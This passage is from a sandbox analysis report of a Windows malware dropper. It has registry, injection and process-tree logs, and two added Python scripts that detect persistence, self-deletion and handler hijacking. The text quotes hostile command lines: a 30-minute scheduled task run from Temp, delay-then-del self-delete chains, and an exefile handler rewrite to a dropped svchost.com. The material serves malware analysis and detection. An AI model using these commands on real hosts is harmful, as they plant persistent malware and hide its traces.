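the sandbox report; SAMPLES copies command lines from this report plus one
constructed benign line; helper names and USER_WRITABLE are assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass

TOKEN_RE = re.compile(r'"[^"]*"|\S+')          # a quoted run or a bare word
CHAIN_OPS = {"&", "&&", "||", "|"}              # cmd.exe stage separators
DELAY_TOOLS = {"timeout", "choice", "ping", "sleep"}
DELETE_TOOLS = {"del", "erase"}
# Roots a standard user can write to (assumed shortlist): a task action living
# here needs no admin rights to plant.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

SAMPLES = {  # first three copied from this report's process tree, last one constructed
    "schtasks": r"""schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F""",
    "regasm_delete": r'''"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"''',
    "build_delete": r'''"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"''',
    "benign": r'''schtasks /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00''',
}

def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace but keep quoted runs together; outer quotes dropped."""
    return [tok.strip('"') for tok in TOKEN_RE.findall(cmdline)]

def image_name(tok: str) -> str:
    """'C:\\Windows\\System32\\cmd.exe' -> 'cmd', 'DEL' -> 'del'."""
    name = tok.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return re.sub(r"\.(exe|com)$", "", name)

def strip_cmd_wrapper(tokens: list[str]) -> list[str]:
    """Drop a leading 'cmd.exe /c' (or /k) so the inner command is what gets examined."""
    if tokens and image_name(tokens[0]) == "cmd":
        for i, tok in enumerate(tokens[1:], start=1):
            if tok.lower() in ("/c", "/k"):
                return tokens[i + 1:]
    return tokens

def split_chain(tokens: list[str]) -> list[list[str]]:
    """Cut the token list at &, &&, || and | into separate command stages."""
    stages: list[list[str]] = [[]]
    for tok in tokens:
        if tok in CHAIN_OPS:
            stages.append([])
        else:
            stages[-1].append(tok)
    return [stage for stage in stages if stage]

@dataclass
class TaskCreate:
    name: str
    action: str
    schedule: str
    modifier: str | None
    force: bool

def parse_schtasks_create(stage: list[str]) -> TaskCreate | None:
    """Pull /tn /tr /sc /mo /f out of a 'schtasks /create' stage, else None."""
    lowered = [tok.lower() for tok in stage]
    if image_name(stage[0]) != "schtasks" or "/create" not in lowered:
        return None
    opts = {tok: stage[i + 1] for i, tok in enumerate(lowered[:-1])
            if tok in ("/tn", "/tr", "/sc", "/mo", "/st")}
    return TaskCreate(name=opts.get("/tn", ""),
                      action=opts.get("/tr", "").strip("'"),  # report shows /tr "'path'"
                      schedule=opts.get("/sc", "").lower(),
                      modifier=opts.get("/mo"), force="/f" in lowered)

def self_delete_target(stages: list[list[str]]) -> str | None:
    """Path removed by a del/erase stage that directly follows a delay stage."""
    for prev, cur in zip(stages, stages[1:]):
        if image_name(prev[0]) in DELAY_TOOLS and image_name(cur[0]) in DELETE_TOOLS:
            paths = [tok for tok in cur[1:] if not tok.startswith("/")]
            return paths[-1] if paths else ""
    return None

def triage(cmdline: str) -> list[str]:
    """Human-readable findings for one command line; empty list means nothing notable."""
    findings: list[str] = []
    stages = split_chain(strip_cmd_wrapper(tokenize(cmdline)))
    for stage in stages:
        task = parse_schtasks_create(stage)
        if task is None:
            continue
        when = task.schedule + (f"/{task.modifier}" if task.modifier else "")
        findings.append(f"scheduled task '{task.name}' -> {task.action} ({when})")
        if any(root in task.action.lower() for root in USER_WRITABLE):
            findings.append("task action lives in a user-writable path")
        if task.schedule == "minute" and (task.modifier or "").isdigit() and int(task.modifier) <= 60:
            findings.append(f"high-frequency trigger: every {task.modifier} minute(s)")
    target = self_delete_target(stages)
    if target is not None:
        findings.append(f"self-delete chain: delay then del of {target or '<unknown>'}")
    return findings

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(label, triage(line) or ["nothing notable"])
```

The wrapper stripping matters: both self-delete chains arrive as `cmd.exe /C ...`, and the `/C` of the wrapper must be consumed before `choice /C Y` is examined, otherwise the inner `/C` is mistaken for a second wrapper. Splitting on `&`/`&&` before pattern matching is what lets the `chcp 65001` stage in the build1234.exe chain sit in front of the delay without hiding it.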
Kills process with taskkill 5 IoCs
Processes:
taskkill.exe
pid  process
5836 taskkill.exe
1580 taskkill.exe
5300 taskkill.exe
3120 taskkill.exe
5804 taskkill.exe
-
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class 53 IoCs
Processes:
explorer.exe, find.exe, svchost.com, stub.exe, 15C633~1.EXE, cmd.exe, Opolis.exe, 4363463463464363463463463.exe, powershell.exe
description  ioc  process  (53 rows; adjacent identical rows collapsed)
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 56003100000000003d586d621000526f616d696e6700400009000400efbe965774b13d586e622e00000084e10100000001000000000000000000000000000000ca995c0052006f0061006d0069006e006700000016000000  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  find.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  svchost.com
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000965774b112004170704461746100400009000400efbe965774b13d5865622e00000083e1010000000100000000000000000000000000000055a654004100700070004400610074006100000016000000  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  stub.exe  (×4)
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff  explorer.exe
Set value (int)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1"  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  15C633~1.EXE
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  cmd.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  stub.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  Opolis.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"  stub.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  stub.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000965774b11100557365727300640009000400efbe874f77483d5865622e000000c70500000000010000000000000000003a00000000000df4620055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  stub.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  4363463463464363463463463.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5000310000000000965783b9100041646d696e003c0009000400efbe965774b13d5865622e00000078e101000000010000000000000000000000000000008c45d500410064006d0069006e00000014000000  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  stub.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  powershell.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  stub.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 5e003100000000003d586d6210004d4143524f4d7e310000460009000400efbe3d586d623d586d622e000000463202000000090000000000000000000000000000009a46ab004d006100630072006f006d006500640069006100000018000000  explorer.exe
Set value (data)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff  explorer.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings  4363463463464363463463463.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0  explorer.exe
Key created  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0  explorer.exe
-
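Most of the rows above are explorer.exe shell-bag noise; the one that matters is stub.exe rewriting HKLM\SOFTWARE\Classes\exefile\shell\open\command to `C:\Windows\svchost.com "%1" %*`, which routes every .exe launch on the machine through the dropped svchost.com first (the same process also writes C:\Windows\svchost.com, C:\Windows\svchost.exe and C:\Windows\directx.sys in the file list earlier in this section). The Python below is an added example by the editor, not part of the sandbox report or its tooling: it parses `description ioc process` rows of the flattened shape used in this report into records and applies checks for the behaviours recorded here, namely the exefile handler hijack, files written straight into C:\Windows, system binary names outside their home directory (the taskhostw.exe created under SystemApps), and the .job file in C:\Windows\Tasks. SAMPLE_EVENTS copies one row per behaviour from this report; the SYSTEM_BINARIES table and the helper names are assumptions.

```python
"""Parse the flattened 'description ioc process' rows of a sandbox report into
records and flag the behaviours visible in this one: the exefile open handler
rewritten to a dropped binary, files written straight into C:\\Windows, system
binary names outside their home directory, and legacy .job task files.
Editor's example, not the sandbox's tooling; SAMPLE_EVENTS copies one row per
behaviour from this report; SYSTEM_BINARIES and helper names are assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass

ACTIONS = ("File opened for modification", "File created", "Key created", "Key opened",
           "Key value queried", "Set value (str)", "Set value (data)", "Set value (int)")
# Where each name legitimately lives (assumed shortlist); the same name anywhere
# else is a masquerade candidate.
SYSTEM_BINARIES = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "taskhostw.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
}
SAMPLE_EVENTS = r"""
File opened for modification C:\Windows\directx.sys stub.exe
File created C:\Windows\svchost.exe stub.exe
File created C:\Windows\Tasks\Dctooux.job Conhost.exe
File created C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe find.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" stub.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" explorer.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe
"""

@dataclass
class Event:
    action: str
    path: str           # file path or registry key, trailing backslash removed
    value: str | None   # decoded data for 'Set value' rows
    process: str

def decode_value(raw: str) -> str:
    """Undo the report's rendering of string data: outer quotes and backslash escapes."""
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        raw = raw[1:-1]
    return raw.replace('\\"', '"').replace("\\\\", "\\")

def parse_event(line: str) -> Event:
    """'<action> <ioc>[ = <value>] <process>'; the process is always the last token."""
    line = line.strip()
    for action in ACTIONS:
        if line.startswith(action + " "):
            ioc, _, process = line[len(action) + 1:].rpartition(" ")
            value = None
            if " = " in ioc:
                ioc, _, raw = ioc.partition(" = ")
                value = decode_value(raw)
            return Event(action, ioc.rstrip("\\"), value, process)
    raise ValueError(f"unrecognised event row: {line!r}")

def first_token(cmd: str) -> str:
    """First argument of a command string, honouring double quotes."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))', cmd)
    return (m.group(1) or m.group(2) or "") if m else ""

def check_event(ev: Event) -> list[str]:
    hits: list[str] = []
    low = ev.path.lower()
    if ev.action.startswith("Set value") and low.endswith(r"\classes\exefile\shell\open\command"):
        handler = first_token(ev.value or "")
        if handler != "%1":  # the stock handler is "%1" %*, i.e. run the .exe itself
            hits.append(f"exefile handler hijack: .exe launches routed through {handler} ({ev.process})")
    if ev.action.startswith("File"):
        parent, _, name = low.rpartition("\\")
        if parent == r"c:\windows":
            hits.append(f"write directly under C:\\Windows: {ev.path} ({ev.process})")
        if parent == r"c:\windows\tasks" and name.endswith(".job"):
            hits.append(f"legacy scheduled-task .job file: {ev.path} ({ev.process})")
        home = SYSTEM_BINARIES.get(name)
        if home is not None and parent not in home:
            hits.append(f"system binary name outside its home: {ev.path} ({ev.process})")
    return hits

def analyse(report_rows: str) -> list[str]:
    """Run every check over every non-blank row and collect the findings."""
    return [hit for line in report_rows.splitlines() if line.strip()
            for hit in check_event(parse_event(line))]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print("-", finding)
```

The parser relies on two properties of this report's rows: process names never contain spaces (so the last whitespace-separated token is the process even when the registry path contains "Local Settings"), and string data is rendered with doubled backslashes and `\"` for embedded quotes, which decode_value reverses before the handler's first argument is compared against the stock `"%1"`. On a live host the same check is a single registry read of the `exefile\shell\open\command` default value.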
Modifies registry key 1 TTPs 4 IoCs
Processes:
reg.exe
pid  process
5828 reg.exe
5984 reg.exe
5892 reg.exe
5560 reg.exe
-
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXE
pid  process
2536 PING.EXE
2832 PING.EXE
3888 PING.EXE
5340 PING.EXE
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description  flow  ioc
HTTP User-Agent header  200  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
first.exe, explorer.exe
pid  process
2976 first.exe
3916 explorer.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
find.exe, powershell.exe, svchost1.exe, Conhost.exe, AppLaunch.exe
pid  process  (64 entries; identical entries collapsed)
3120 find.exe  (×48)
5044 powershell.exe  (×3)
1636 svchost1.exe  (×4)
4244 Conhost.exe  (×3)
3132 AppLaunch.exe  (×2)
1336 powershell.exe  (×2)
1832 powershell.exe  (×2)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
OSM-Client.exe
pid  process
3052 OSM-Client.exe
-
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
4363463463464363463463463.exe, crypted.exe, find.exe, first.exe, svchost1.exe, powershell.exe, Conhost.exe, AppLaunch.exe, taskkill.exe, alex.exe, build1234.exe, Logs.exe, WatchDog.exe, olehps.exe, RegAsm.exe, explorer.exe
description  pid  process
Token: SeDebugPrivilege  1328  4363463463464363463463463.exe
Token: SeLoadDriverPrivilege  4276  crypted.exe
Token: SeDebugPrivilege  3120  find.exe
Token: SeDebugPrivilege  2976  first.exe
Token: SeDebugPrivilege  1636  svchost1.exe
Token: SeDebugPrivilege  5044  powershell.exe
Token: SeDebugPrivilege  4244  Conhost.exe
Token: SeDebugPrivilege  2976  first.exe
Token: SeDebugPrivilege  3132  AppLaunch.exe
Token: SeDebugPrivilege  1336  powershell.exe
Token: SeDebugPrivilege  1832  powershell.exe
Token: SeDebugPrivilege  2300  powershell.exe
Token: SeDebugPrivilege  4272  powershell.exe
Token: SeDebugPrivilege  4020  Conhost.exe
Token: SeDebugPrivilege  3416  powershell.exe
Token: SeDebugPrivilege  3772  powershell.exe
Token: SeDebugPrivilege  2224  powershell.exe
Token: SeDebugPrivilege  4964  powershell.exe
Token: SeDebugPrivilege  3296  powershell.exe
Token: SeDebugPrivilege  4336  powershell.exe
Token: SeDebugPrivilege  4928  powershell.exe
Token: SeDebugPrivilege  1348  powershell.exe
Token: SeDebugPrivilege  5804  taskkill.exe
Token: SeDebugPrivilege  5836  taskkill.exe
Token: SeDebugPrivilege  3120  find.exe
Token: SeDebugPrivilege  1580  taskkill.exe
Token: SeDebugPrivilege  5300  taskkill.exe
Token: SeDebugPrivilege  5184  4363463463464363463463463.exe
Token: SeDebugPrivilege  3632  powershell.exe
Token: SeDebugPrivilege  5272  powershell.exe
Token: SeDebugPrivilege  5436  4363463463464363463463463.exe
Token: SeDebugPrivilege  1732  alex.exe
Token: SeDebugPrivilege  6108  build1234.exe
Token: SeDebugPrivilege  5584  Logs.exe
Token: SeDebugPrivilege  1676  WatchDog.exe
Token: SeDebugPrivilege  6036  olehps.exe
Token: SeDebugPrivilege  1800  RegAsm.exe
Token: SeLockMemoryPrivilege  1400  explorer.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
networa.exe, Conhost.exe
pid  process  (64 entries; identical entries collapsed)
2364 networa.exe  (×63)
2948 Conhost.exe  (×1)
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
networa.exe
pid  process  (64 entries, all identical)
2364 networa.exe  (×64)
-
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
Conhost.exe, u3ts.1.exe, svchost1.exe, explorer.exe, Dctooux.exe
pid  process
2948 Conhost.exe  (×2)
3016 u3ts.1.exe
1636 svchost1.exe
3916 explorer.exe  (×2)
4408 Dctooux.exe  (×2)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exe, powershell.exe, InstallSetup.exe, cmd.exe, ofg7d45fsdfgg312.exe, u3ts.1.exe, first.exe, dusers.exe
description  pid  process  target process  (64 entries; identical entries collapsed)
PID 1328 wrote to memory of 4276  4363463463464363463463463.exe -> crypted.exe  (×3)
PID 1328 wrote to memory of 2364  4363463463464363463463463.exe -> networa.exe  (×3)
PID 1328 wrote to memory of 2224  4363463463464363463463463.exe -> powershell.exe  (×3)
PID 2224 wrote to memory of 5004  powershell.exe -> cmd.exe  (×3)
PID 1328 wrote to memory of 1332  4363463463464363463463463.exe -> Conhost.exe  (×3)
PID 1328 wrote to memory of 4960  4363463463464363463463463.exe -> InstallSetup.exe  (×3)
PID 4960 wrote to memory of 3968  InstallSetup.exe -> u3ts.0.exe  (×3)
PID 1328 wrote to memory of 1636  4363463463464363463463463.exe -> svchost1.exe  (×2)
PID 1328 wrote to memory of 2948  4363463463464363463463463.exe -> Conhost.exe  (×3)
PID 5004 wrote to memory of 4936  cmd.exe -> cmd.exe  (×3)
PID 4936 wrote to memory of 3120  cmd.exe -> find.exe  (×2)
PID 1328 wrote to memory of 4072  4363463463464363463463463.exe -> i.exe  (×3)
PID 1328 wrote to memory of 2976  4363463463464363463463463.exe -> first.exe  (×2)
PID 4960 wrote to memory of 3016  InstallSetup.exe -> u3ts.1.exe  (×3)
PID 1328 wrote to memory of 1356  4363463463464363463463463.exe -> ofg7d45fsdfgg312.exe  (×3)
PID 1356 wrote to memory of 1300  ofg7d45fsdfgg312.exe -> SCHTASKS.exe  (×3)
PID 1328 wrote to memory of 2876  4363463463464363463463463.exe -> dusers.exe  (×3)
PID 3016 wrote to memory of 5004  u3ts.1.exe -> cmd.exe  (×3)
PID 2976 wrote to memory of 5044  first.exe -> powershell.exe  (×2)
PID 2876 wrote to memory of 1512  dusers.exe -> cmd.exe  (×3)
PID 5004 wrote to memory of 2232  cmd.exe -> chcp.com  (×3)
PID 1512 wrote to memory of 2648  cmd.exe -> Users.exe  (×3)
PID 5004 wrote to memory of 244  cmd.exe -> wmild.exe  (×2)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
build1234.exe
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  build1234.exe
-
outlook_win_path 1 IoCs
Processes:
build1234.exe
description  ioc  process
Key opened  \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  build1234.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"  1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"  2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\networa.exe  "C:\Users\Admin\AppData\Local\Temp\Files\networa.exe"  2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\Files\fund.exe  "C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"  2⤵
-
C:\Windows\SysWOW64\WScript.exe  "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"  3⤵
-
C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "  4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe  "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe"  2⤵
-
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 1124  3⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe  "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe"  2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe  "C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe"  3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 816  4⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u3ts.1.exe  "C:\Users\Admin\AppData\Local\Temp\u3ts.1.exe"  3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "  4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.com  chcp 1251  5⤵
-
C:\Windows\SysWOW64\schtasks.exe  schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F  5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 1144  3⤵
